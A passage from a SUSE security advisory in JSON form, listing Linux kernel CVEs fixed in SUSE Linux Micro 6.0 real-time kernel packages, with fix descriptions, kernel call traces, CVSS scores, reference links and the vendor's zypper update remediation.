"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2023-54008"
},
{
"cve": "CVE-2023-54013",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54013"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ninterconnect: Fix locking for runpm vs reclaim\n\nFor cases where icc_bw_set() can be called in callbaths that could\ndeadlock against shrinker/reclaim, such as runpm resume, we need to\ndecouple the icc locking. Introduce a new icc_bw_lock for cases where\nwe need to serialize bw aggregation and update to decouple that from\npaths that require memory allocation such as node/link creation/\ndestruction.\n\nFixes this lockdep splat:\n\n ======================================================\n WARNING: possible circular locking dependency detected\n 6.2.0-rc8-debug+ #554 Not tainted\n ------------------------------------------------------\n ring0/132 is trying to acquire lock:\n ffffff80871916d0 (\u0026gmu-\u003elock){+.+.}-{3:3}, at: a6xx_pm_resume+0xf0/0x234\n\n but task is already holding lock:\n ffffffdb5aee57e8 (dma_fence_map){++++}-{0:0}, at: msm_job_run+0x68/0x150\n\n which lock already depends on the new lock.\n\n the existing dependency chain (in reverse order) is:\n\n -\u003e #4 (dma_fence_map){++++}-{0:0}:\n __dma_fence_might_wait+0x74/0xc0\n dma_resv_lockdep+0x1f4/0x2f4\n do_one_initcall+0x104/0x2bc\n kernel_init_freeable+0x344/0x34c\n kernel_init+0x30/0x134\n ret_from_fork+0x10/0x20\n\n -\u003e #3 (mmu_notifier_invalidate_range_start){+.+.}-{0:0}:\n fs_reclaim_acquire+0x80/0xa8\n slab_pre_alloc_hook.constprop.0+0x40/0x25c\n __kmem_cache_alloc_node+0x60/0x1cc\n __kmalloc+0xd8/0x100\n topology_parse_cpu_capacity+0x8c/0x178\n get_cpu_for_node+0x88/0xc4\n parse_cluster+0x1b0/0x28c\n parse_cluster+0x8c/0x28c\n init_cpu_topology+0x168/0x188\n smp_prepare_cpus+0x24/0xf8\n kernel_init_freeable+0x18c/0x34c\n kernel_init+0x30/0x134\n ret_from_fork+0x10/0x20\n\n -\u003e #2 (fs_reclaim){+.+.}-{0:0}:\n __fs_reclaim_acquire+0x3c/0x48\n fs_reclaim_acquire+0x54/0xa8\n slab_pre_alloc_hook.constprop.0+0x40/0x25c\n __kmem_cache_alloc_node+0x60/0x1cc\n __kmalloc+0xd8/0x100\n kzalloc.constprop.0+0x14/0x20\n icc_node_create_nolock+0x4c/0xc4\n icc_node_create+0x38/0x58\n qcom_icc_rpmh_probe+0x1b8/0x248\n platform_probe+0x70/0xc4\n really_probe+0x158/0x290\n __driver_probe_device+0xc8/0xe0\n driver_probe_device+0x44/0x100\n __driver_attach+0xf8/0x108\n bus_for_each_dev+0x78/0xc4\n driver_attach+0x2c/0x38\n bus_add_driver+0xd0/0x1d8\n driver_register+0xbc/0xf8\n __platform_driver_register+0x30/0x3c\n qnoc_driver_init+0x24/0x30\n do_one_initcall+0x104/0x2bc\n kernel_init_freeable+0x344/0x34c\n kernel_init+0x30/0x134\n ret_from_fork+0x10/0x20\n\n -\u003e #1 (icc_lock){+.+.}-{3:3}:\n __mutex_lock+0xcc/0x3c8\n mutex_lock_nested+0x30/0x44\n icc_set_bw+0x88/0x2b4\n _set_opp_bw+0x8c/0xd8\n _set_opp+0x19c/0x300\n dev_pm_opp_set_opp+0x84/0x94\n a6xx_gmu_resume+0x18c/0x804\n a6xx_pm_resume+0xf8/0x234\n adreno_runtime_resume+0x2c/0x38\n pm_generic_runtime_resume+0x30/0x44\n __rpm_callback+0x15c/0x174\n rpm_callback+0x78/0x7c\n rpm_resume+0x318/0x524\n __pm_runtime_resume+0x78/0xbc\n adreno_load_gpu+0xc4/0x17c\n msm_open+0x50/0x120\n drm_file_alloc+0x17c/0x228\n drm_open_helper+0x74/0x118\n drm_open+0xa0/0x144\n drm_stub_open+0xd4/0xe4\n chrdev_open+0x1b8/0x1e4\n do_dentry_open+0x2f8/0x38c\n vfs_open+0x34/0x40\n path_openat+0x64c/0x7b4\n do_filp_open+0x54/0xc4\n do_sys_openat2+0x9c/0x100\n do_sys_open+0x50/0x7c\n __arm64_sys_openat+0x28/0x34\n invoke_syscall+0x8c/0x128\n el0_svc_common.constprop.0+0xa0/0x11c\n do_el0_\n---truncated---",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54013",
"url": "https://www.suse.com/security/cve/CVE-2023-54013"
},
{
"category": "external",
"summary": "SUSE Bug 1256280 for CVE-2023-54013",
"url": "https://bugzilla.suse.com/1256280"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.7,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2023-54013"
},
{
"cve": "CVE-2023-54014",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54014"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nscsi: qla2xxx: Check valid rport returned by fc_bsg_to_rport()\n\nKlocwork reported warning of rport maybe NULL and will be dereferenced.\nrport returned by call to fc_bsg_to_rport() could be NULL and dereferenced.\n\nCheck valid rport returned by fc_bsg_to_rport().",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54014",
"url": "https://www.suse.com/security/cve/CVE-2023-54014"
},
{
"category": "external",
"summary": "SUSE Bug 1256300 for CVE-2023-54014",
"url": "https://bugzilla.suse.com/1256300"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2023-54014"
},
{
"cve": "CVE-2023-54016",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54016"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nwifi: ath12k: Fix memory leak in rx_desc and tx_desc\n\nCurrently when ath12k_dp_cc_desc_init() is called we allocate\nmemory to rx_descs and tx_descs. In ath12k_dp_cc_cleanup(), during\ndescriptor cleanup rx_descs and tx_descs memory is not freed.\n\nThis is cause of memory leak. These allocated memory should be\nfreed in ath12k_dp_cc_cleanup.\n\nIn ath12k_dp_cc_desc_init(), we can save base address of rx_descs\nand tx_descs. In ath12k_dp_cc_cleanup(), we can free rx_descs and\ntx_descs memory using their base address.\n\nTested-on: QCN9274 hw2.0 PCI WLAN.WBE.1.0.1-00029-QCAHKSWPL_SILICONZ-1",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54016",
"url": "https://www.suse.com/security/cve/CVE-2023-54016"
},
{
"category": "external",
"summary": "SUSE Bug 1256279 for CVE-2023-54016",
"url": "https://bugzilla.suse.com/1256279"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.3,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2023-54016"
},
{
"cve": "CVE-2023-54017",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54017"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\npowerpc/pseries: fix possible memory leak in ibmebus_bus_init()\n\nIf device_register() returns error in ibmebus_bus_init(), name of kobject\nwhich is allocated in dev_set_name() called in device_add() is leaked.\n\nAs comment of device_add() says, it should call put_device() to drop\nthe reference count that was set in device_initialize() when it fails,\nso the name can be freed in kobject_cleanup().",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54017",
"url": "https://www.suse.com/security/cve/CVE-2023-54017"
},
{
"category": "external",
"summary": "SUSE Bug 1255605 for CVE-2023-54017",
"url": "https://bugzilla.suse.com/1255605"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 3.3,
"baseSeverity": "LOW",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "low"
}
],
"title": "CVE-2023-54017"
},
{
"cve": "CVE-2023-54019",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54019"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nsched/psi: use kernfs polling functions for PSI trigger polling\n\nDestroying psi trigger in cgroup_file_release causes UAF issues when\na cgroup is removed from under a polling process. This is happening\nbecause cgroup removal causes a call to cgroup_file_release while the\nactual file is still alive. Destroying the trigger at this point would\nalso destroy its waitqueue head and if there is still a polling process\non that file accessing the waitqueue, it will step on the freed pointer:\n\ndo_select\n vfs_poll\n do_rmdir\n cgroup_rmdir\n kernfs_drain_open_files\n cgroup_file_release\n cgroup_pressure_release\n psi_trigger_destroy\n wake_up_pollfree(\u0026t-\u003eevent_wait)\n// vfs_poll is unblocked\n synchronize_rcu\n kfree(t)\n poll_freewait -\u003e UAF access to the trigger\u0027s waitqueue head\n\nPatch [1] fixed this issue for epoll() case using wake_up_pollfree(),\nhowever the same issue exists for synchronous poll() case.\nThe root cause of this issue is that the lifecycles of the psi trigger\u0027s\nwaitqueue and of the file associated with the trigger are different. Fix\nthis by using kernfs_generic_poll function when polling on cgroup-specific\npsi triggers. It internally uses kernfs_open_node-\u003epoll waitqueue head\nwith its lifecycle tied to the file\u0027s lifecycle. This also renders the\nfix in [1] obsolete, so revert it.\n\n[1] commit c2dbe32d5db5 (\"sched/psi: Fix use-after-free in ep_remove_wait_queue()\")",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54019",
"url": "https://www.suse.com/security/cve/CVE-2023-54019"
},
{
"category": "external",
"summary": "SUSE Bug 1255636 for CVE-2023-54019",
"url": "https://bugzilla.suse.com/1255636"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2023-54019"
},
{
"cve": "CVE-2023-54022",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54022"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nALSA: usb-audio: Fix potential memory leaks at error path for UMP open\n\nThe allocation and initialization errors at alloc_midi_urbs() that is\ncalled at MIDI 2.0 / UMP device are supposed to be handled at the\ncaller side by invoking free_midi_urbs(). However, free_midi_urbs()\nloops only for ep-\u003enum_urbs entries, and since ep-\u003enum_entries wasn\u0027t\nupdated yet at the allocation / init error in alloc_midi_urbs(), this\nentry won\u0027t be released.\n\nThe intention of free_midi_urbs() is to release the whole elements, so\nchange the loop size to NUM_URBS to scan over all elements for fixing\nthe missed releases.\n\nAlso, the call of free_midi_urbs() is missing at\nsnd_usb_midi_v2_open(). Although it\u0027ll be released later at\nreopen/close or disconnection, it\u0027s better to release immediately at\nthe error path.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54022",
"url": "https://www.suse.com/security/cve/CVE-2023-54022"
},
{
"category": "external",
"summary": "SUSE Bug 1255545 for CVE-2023-54022",
"url": "https://bugzilla.suse.com/1255545"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2023-54022"
},
{
"cve": "CVE-2023-54023",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54023"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nbtrfs: fix race between balance and cancel/pause\n\nSyzbot reported a panic that looks like this:\n\n assertion failed: fs_info-\u003eexclusive_operation == BTRFS_EXCLOP_BALANCE_PAUSED, in fs/btrfs/ioctl.c:465\n ------------[ cut here ]------------\n kernel BUG at fs/btrfs/messages.c:259!\n RIP: 0010:btrfs_assertfail+0x2c/0x30 fs/btrfs/messages.c:259\n Call Trace:\n \u003cTASK\u003e\n btrfs_exclop_balance fs/btrfs/ioctl.c:465 [inline]\n btrfs_ioctl_balance fs/btrfs/ioctl.c:3564 [inline]\n btrfs_ioctl+0x531e/0x5b30 fs/btrfs/ioctl.c:4632\n vfs_ioctl fs/ioctl.c:51 [inline]\n __do_sys_ioctl fs/ioctl.c:870 [inline]\n __se_sys_ioctl fs/ioctl.c:856 [inline]\n __x64_sys_ioctl+0x197/0x210 fs/ioctl.c:856\n do_syscall_x64 arch/x86/entry/common.c:50 [inline]\n do_syscall_64+0x39/0xb0 arch/x86/entry/common.c:80\n entry_SYSCALL_64_after_hwframe+0x63/0xcd\n\nThe reproducer is running a balance and a cancel or pause in parallel.\nThe way balance finishes is a bit wonky, if we were paused we need to\nsave the balance_ctl in the fs_info, but clear it otherwise and cleanup.\nHowever we rely on the return values being specific errors, or having a\ncancel request or no pause request. If balance completes and returns 0,\nbut we have a pause or cancel request we won\u0027t do the appropriate\ncleanup, and then the next time we try to start a balance we\u0027ll trip\nthis ASSERT.\n\nThe error handling is just wrong here, we always want to clean up,\nunless we got -ECANCELLED and we set the appropriate pause flag in the\nexclusive op. With this patch the reproducer ran for an hour without\ntripping, previously it would trip in less than a few minutes.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54023",
"url": "https://www.suse.com/security/cve/CVE-2023-54023"
},
{
"category": "external",
"summary": "SUSE Bug 1256301 for CVE-2023-54023",
"url": "https://bugzilla.suse.com/1256301"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2023-54023"
},
{
"cve": "CVE-2023-54025",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54025"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nwifi: rsi: Do not configure WoWlan in shutdown hook if not enabled\n\nIn case WoWlan was never configured during the operation of the system,\nthe hw-\u003ewiphy-\u003ewowlan_config will be NULL. rsi_config_wowlan() checks\nwhether wowlan_config is non-NULL and if it is not, then WARNs about it.\nThe warning is valid, as during normal operation the rsi_config_wowlan()\nshould only ever be called with non-NULL wowlan_config. In shutdown this\nrsi_config_wowlan() should only ever be called if WoWlan was configured\nbefore by the user.\n\nAdd checks for non-NULL wowlan_config into the shutdown hook. While at it,\ncheck whether the wiphy is also non-NULL before accessing wowlan_config .\nDrop the single-use wowlan_config variable, just inline it into function\ncall.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54025",
"url": "https://www.suse.com/security/cve/CVE-2023-54025"
},
{
"category": "external",
"summary": "SUSE Bug 1255558 for CVE-2023-54025",
"url": "https://bugzilla.suse.com/1255558"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2023-54025"
},
{
"cve": "CVE-2023-54026",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54026"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nopp: Fix use-after-free in lazy_opp_tables after probe deferral\n\nWhen dev_pm_opp_of_find_icc_paths() in _allocate_opp_table() returns\n-EPROBE_DEFER, the opp_table is freed again, to wait until all the\ninterconnect paths are available.\n\nHowever, if the OPP table is using required-opps then it may already\nhave been added to the global lazy_opp_tables list. The error path\ndoes not remove the opp_table from the list again.\n\nThis can cause crashes later when the provider of the required-opps\nis added, since we will iterate over OPP tables that have already been\nfreed. E.g.:\n\n Unable to handle kernel NULL pointer dereference when read\n CPU: 0 PID: 7 Comm: kworker/0:0 Not tainted 6.4.0-rc3\n PC is at _of_add_opp_table_v2 (include/linux/of.h:949\n drivers/opp/of.c:98 drivers/opp/of.c:344 drivers/opp/of.c:404\n drivers/opp/of.c:1032) -\u003e lazy_link_required_opp_table()\n\nFix this by calling _of_clear_opp_table() to remove the opp_table from\nthe list and clear other allocated resources. While at it, also add the\nmissing mutex_destroy() calls in the error path.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54026",
"url": "https://www.suse.com/security/cve/CVE-2023-54026"
},
{
"category": "external",
"summary": "SUSE Bug 1255549 for CVE-2023-54026",
"url": "https://bugzilla.suse.com/1255549"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2023-54026"
},
{
"cve": "CVE-2023-54027",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54027"
}
],
"notes": [
{
"category": "general",
